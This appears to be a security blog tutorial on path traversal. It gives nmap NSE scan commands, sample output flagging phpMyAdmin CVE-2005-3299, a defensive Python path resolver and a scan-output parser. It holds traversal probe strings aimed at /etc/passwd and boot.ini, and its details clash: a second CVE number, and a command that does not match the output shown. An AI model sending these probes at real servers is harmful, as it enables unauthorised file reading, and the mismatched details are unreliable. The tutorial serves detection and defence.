
Path traversal (CVE-2005-3299) with NMAP

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration files and critical system files. Note that what can be read is still limited by the operating system's access controls: the web server process only reaches files its own account is permitted to read. This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
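To make the mechanism concrete, here is an added example (not code from the original post) that resolves a few request paths against a document root in two ways: a naive resolver that simply joins the user-supplied path onto the root, the way a vulnerable handler does, and a hardened resolver that decodes, normalises and then checks that the result still lies under the root. The document root /var/www/html and the list of request paths are constructed for the demonstration; the escape attempts cover the plain ../ sequence, URL-encoded and double-encoded variants, backslash separators and an absolute path, which is the set of variations the paragraph above refers to.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the demonstration; a real server takes this from its config.
WEB_ROOT = "/var/www/html"


def naive_resolve(web_root: str, requested: str) -> str:
    """Vulnerable pattern: decode once (as a web server would), glue the result onto
    the document root, and let path normalisation decide where it lands."""
    return posixpath.normpath(posixpath.join(web_root, unquote(requested)))


def safe_resolve(web_root: str, requested: str) -> Optional[str]:
    """Hardened pattern: decode, normalise, then confirm the result is still inside
    web_root. Returns None whenever the request would escape the root."""
    root = posixpath.normpath(web_root)
    # Decode twice so double-encoded sequences (%252e%252e%252f) are caught as well.
    decoded = unquote(unquote(requested))
    # Embedded NUL bytes truncate paths in C-based servers; never pass them on.
    if "\x00" in decoded:
        return None
    # Treat backslashes as separators: ..\..\ variants matter on Windows-hosted servers.
    decoded = decoded.replace("\\", "/")
    # An absolute path makes join() discard the root; normpath then exposes the escape.
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Prefix check with the separator appended, so "/var/www/html2" does not slip through.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed request paths: the probe used by the scan plus common variants.
SAMPLE_REQUESTS = [
    "index.php",
    "docs/../index.php",
    "../../../../../etc/passwd",
    "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "%252e%252e%252fetc/passwd",
    "..\\..\\..\\boot.ini",
    "/etc/passwd",
    "../html2/secret.txt",
]


def classify(web_root: str, requests):
    """Return (request, naive_result, safe_result) triples so the two resolvers
    can be compared side by side for every request."""
    return [(r, naive_resolve(web_root, r), safe_resolve(web_root, r)) for r in requests]


if __name__ == "__main__":
    for req, naive, safe in classify(WEB_ROOT, SAMPLE_REQUESTS):
        verdict = "ALLOW" if safe else "BLOCK"
        print(f"{verdict:5} {req!r:40} naive -> {naive}")
```

Running the block prints one line per request; the naive column shows that ../ sequences and absolute paths land on /etc/passwd, and that the double-encoded variant survives a single decode untouched, which is exactly why the hardened resolver decodes twice before deciding.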

Nmap was first published in September 1997, as an article in Phrack Magazine with source-code included. With help and contributions of the computer security community, development continued.

In this post, I’m gonna show you how to find phpmyadmin path traversal (CVE-2007-6750) with NMAP.

Below is an example command using nmap's NSE script. The http-passwd script checks whether a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

nmap --script http-passwd --script-args http-passwd.root=/test/ <Target>
OR
nmap -Pn --script vuln <Target>

If the target is vulnerable to this attack, the scan output will show a result like the following:

| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <html>
|   <head>
|   <script>
|       var redirect = "https://" + window.location.host;
|       function redirectPage() {
|               window.location.href= redirect;
|       }
|   </script>
|   <noscript>
|       <META http-equiv='Refresh' content='0; URL=https://209.50.240.165:8443'>
|   </noscript>
|   </head>
|
|   <body onLoad="redirectPage();">
|   Redirecting to SSL secured connection.
|   <p>
|   If your browser does not automatically redirect you, click
|   <script>
|       window.document.write("<a href=\"" + redirect + "\"> here </a>");
|   </script>
|   <noscript>
|   <a href="https://209.50.240.165:8443"> here </a>
|   </noscript>
|   </p>
|   </body>
|   </html>
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
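When this kind of output comes back from many hosts, the practical next step is to pull out the script name, the State line, the CVE identifiers and the references so that findings can be triaged rather than read by eye. The parser below is an added example written for this post, not part of Nmap; it works on the normal-format script output shown above. The SAMPLE_OUTPUT string is a constructed, trimmed copy of that output (the HTML body returned by the server is cut down to two lines), and the line layout it relies on (a "| " prefix, "|_" on the last line, indented "State:", "IDs:" and "References:" labels) is the layout visible in the output above.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample modelled on the normal-format output above (HTML body trimmed).
SAMPLE_OUTPUT = """\
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4
|       and 2.6.4-pl1 allows remote attackers to include local files.
|
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <html>
|   </html>
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
"""

# Every script-output line starts with "|" or "|_", usually followed by one space.
LINE_RE = re.compile(r"^\|_?\s?(?P<body>.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class ScriptFinding:
    script: str
    title: Optional[str] = None
    state: Optional[str] = None
    cves: List[str] = field(default_factory=list)
    disclosure: Optional[str] = None
    references: List[str] = field(default_factory=list)

    def is_vulnerable(self) -> bool:
        """True for the VULNERABLE and LIKELY VULNERABLE states, False for NOT VULNERABLE."""
        return bool(self.state) and (
            self.state.startswith("VULNERABLE") or self.state.startswith("LIKELY VULNERABLE")
        )


def parse_script_output(text: str) -> List[ScriptFinding]:
    """Parse normal-format NSE script output into one ScriptFinding per script block."""
    findings: List[ScriptFinding] = []
    current: Optional[ScriptFinding] = None
    in_refs = False
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # not a script-output line (port table, host lines, ...)
        body = m.group("body")
        stripped = body.strip()
        indent = len(body) - len(body.lstrip(" "))
        # A script block starts with its name at indent 0, terminated by a colon.
        if indent == 0 and stripped.endswith(":"):
            current = ScriptFinding(script=stripped[:-1])
            findings.append(current)
            in_refs = False
            continue
        if current is None or not stripped:
            continue
        if stripped.startswith("State:"):
            current.state = stripped[len("State:"):].strip()
        elif stripped.startswith("IDs:"):
            current.cves.extend(CVE_RE.findall(stripped))
        elif stripped.startswith("Disclosure date:"):
            current.disclosure = stripped.split(":", 1)[1].strip()
        elif stripped == "References:":
            in_refs = True
        elif in_refs and stripped.startswith(("http://", "https://")):
            current.references.append(stripped)
        elif indent == 2 and current.title is None and not stripped.endswith(":"):
            # The first indent-2 line that is not a label ("VULNERABLE:") is the title.
            current.title = stripped
    return findings


def summarize(findings: List[ScriptFinding]) -> List[str]:
    """One triage line per finding: script, state and CVE list."""
    return [f"{f.script}: {f.state or 'no state'} {f.cves}" for f in findings]


if __name__ == "__main__":
    for line in summarize(parse_script_output(SAMPLE_OUTPUT)):
        print(line)
```

The parser keys on the indentation levels that the vulns output uses, so the HTML that the server returned inside "Extra information" is ignored rather than mistaken for a title or reference; feeding it the full output from the scan above, rather than the trimmed sample, yields the same single finding.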


Video Proof of concept (PoC) of Path traversal attack

